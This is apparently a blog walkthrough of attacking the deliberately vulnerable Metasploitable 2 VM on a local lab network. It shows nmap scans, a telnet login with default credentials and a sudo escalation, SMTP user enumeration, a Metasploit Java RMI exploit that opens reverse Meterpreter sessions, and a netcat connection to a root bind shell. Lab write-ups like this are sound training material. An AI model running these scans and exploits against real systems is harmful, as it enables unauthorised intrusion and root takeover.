Metasploitable 2 is nice challenge to test all vulnerable with metasploit tool. Really sample and nice tricks to get the root with vulnerable version of system.
let’s get start.
┌─[[email protected]]─[~] └──> nmap 192.168.1.* -sn -n Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-09 17:33 +0630 Nmap scan report for 192.168.1.1 Host is up (0.0014s latency). MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies) Nmap scan report for 192.168.1.72 Host is up (0.0017s latency). MAC Address: CC:AF:78:50:24:00 (Hon Hai Precision Ind.) Nmap scan report for 192.168.1.73 Host is up (0.00027s latency). MAC Address: 00:0C:29:C7:95:E6 (VMware) Nmap scan report for 192.168.1.100 Host is up (0.00013s latency). MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer) Nmap scan report for 192.168.1.101 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 1.49 seconds
I start Nmap scanning so that to know the target IP of VM. Now VMware is running on 192.168.1.73. Nmap again to know open ports.
┌─[[email protected]]─[~] └──> nmap -sV -p- 192.168.1.73 Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-09 17:36 +0630 Nmap scan report for kioptrix3.com (192.168.1.73) Host is up (0.0016s latency). Not shown: 65505 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open tcpwrapped 1099/tcp open rmiregistry GNU Classpath grmiregistry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) 6000/tcp open X11 (access denied) 6667/tcp open irc UnrealIRCd 6697/tcp open irc UnrealIRCd 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb) 51268/tcp open rmiregistry GNU Classpath grmiregistry 51834/tcp open mountd 1-3 (RPC #100005) 53124/tcp open status 1 (RPC #100024) 60448/tcp open nlockmgr 1-4 (RPC #100021) MAC Address: 00:0C:29:C7:95:E6 (VMware) Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 127.90 seconds
Awesome,There are many service are running.So may be there have many vulnerables. Let’s exploit from top to bottom.
First vsftpd version is 2.3.4. I find version number on the google to know it exploitable or not.
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor
Yes. I can be exploit with metasploit. Let’s try.
Own!. Next.
OpenSSH 4.7p1 is also vulnerable
https://charlesreid1.com/wiki/Metasploitable/SSH/Exploits
Got root? done. Next.
Telnet also vulnerable with description info.
┌─[[email protected]]─[~] └──> telnet 192.168.1.73 Trying 192.168.1.73... Connected to 192.168.1.73. Escape character is '^]'. _ _ _ _ _ _ ____ _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) | | | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____| |_| Warning: Never expose this VM to an untrusted network! Contact: msfdev[at]metasploit.com Login with msfadmin/msfadmin to get started metasploitable login: msfadmin Password: Last login: Tue Jan 9 05:44:13 EST 2018 from 192.168.1.101 on pts/1 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ No mail. [email protected]:~$ sudo -s [sudo] password for msfadmin: [email protected]:~# id uid=0(root) gid=0(root) groups=0(root) [email protected]:~#
Next SMTP user enumeration
msf > use exploit/linux/misc/gld_postfix msf exploit(linux/misc/gld_postfix) > show options Module options (exploit/linux/misc/gld_postfix): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 2525 yes The target port (TCP) Exploit target: Id Name -- ---- 0 RedHat Linux 7.0 (Guinness) msf exploit(linux/misc/gld_postfix) > set RHOST 192.168.1.73 RHOST => 192.168.1.73 msf exploit(linux/misc/gld_postfix) > run [*] Started reverse TCP handler on 192.168.1.101:4444 [-] 192.168.1.73:2525 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.73:2525). [*] Exploit completed, but no session was created. msf exploit(linux/misc/gld_postfix) > use auxiliary/scanner/smtp/smtp_enum msf auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 192.168.1.73 RHOSTS => 192.168.1.73 msf auxiliary(scanner/smtp/smtp_enum) > run [*] 192.168.1.73:25 - 192.168.1.73:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu) [+] 192.168.1.73:25 - 192.168.1.73:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Next Samba smbd 3.X, it can be exploit but i don’t show in this walkthrough because it already write at the last one.
Next GNU Classpath, 😉
msf auxiliary(scanner/smtp/smtp_enum) > use exploit/multi/misc/java_rmi_server msf exploit(multi/misc/java_rmi_server) > show options Module options (exploit/multi/misc/java_rmi_server): Name Current Setting Required Description ---- --------------- -------- ----------- HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request RHOST yes The target address RPORT 1099 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Generic (Java Payload) msf exploit(multi/misc/java_rmi_server) > set RHOST 192.168.1.73 RHOST => 192.168.1.73 msf exploit(multi/misc/java_rmi_server) > run [*] Started reverse TCP handler on 192.168.1.101:4444 [*] 192.168.1.73:1099 - Using URL: http://0.0.0.0:8080/wKNQ8aS6geYU [*] 192.168.1.73:1099 - Local IP: http://192.168.1.101:8080/wKNQ8aS6geYU [*] 192.168.1.73:1099 - Server started. [*] 192.168.1.73:1099 - Sending RMI Header... [*] 192.168.1.73:1099 - Sending RMI Call... [*] 192.168.1.73:1099 - Replied to request for payload JAR [*] Sending stage (53837 bytes) to 192.168.1.73 [*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.73:36318) at 2018-01-09 18:53:38 +0630 id [-] 192.168.1.73:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request [*] 192.168.1.73:1099 - Server stopped. [*] Exploit completed, but no session was created. msf exploit(multi/misc/java_rmi_server) > id [*] exec: id uid=0(root) gid=0(root) groups=0(root) msf exploit(multi/misc/java_rmi_server) > run [*] Started reverse TCP handler on 192.168.1.101:4444 [*] 192.168.1.73:1099 - Using URL: http://0.0.0.0:8080/iSyb4JDXRzhA5h [*] 192.168.1.73:1099 - Local IP: http://192.168.1.101:8080/iSyb4JDXRzhA5h [*] 192.168.1.73:1099 - Server started. [*] 192.168.1.73:1099 - Sending RMI Header... [*] 192.168.1.73:1099 - Sending RMI Call... [*] 192.168.1.73:1099 - Replied to request for payload JAR [*] Sending stage (53837 bytes) to 192.168.1.73 [*] Meterpreter session 2 opened (192.168.1.101:4444 -> 192.168.1.73:33132) at 2018-01-09 18:53:58 +0630 ^C[-] 192.168.1.73:1099 - Exploit failed: Interrupt [*] 192.168.1.73:1099 - Server stopped. [*] Exploit completed, but no session was created. msf exploit(multi/misc/java_rmi_server) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 1 created. Channel 1 created. id uid=0(root) gid=0(root) uname -a Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Got root!. Next shell connection
┌─[[email protected]]─[~] └──> nc 192.168.1.73 1524 [email protected]:/# id uid=0(root) gid=0(root) groups=0(root) [email protected]:/# uname -a Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux [email protected]:/#
Woot! Thanks for reading. Happy Hacking..
PS – There are many exploit methods. Good luck.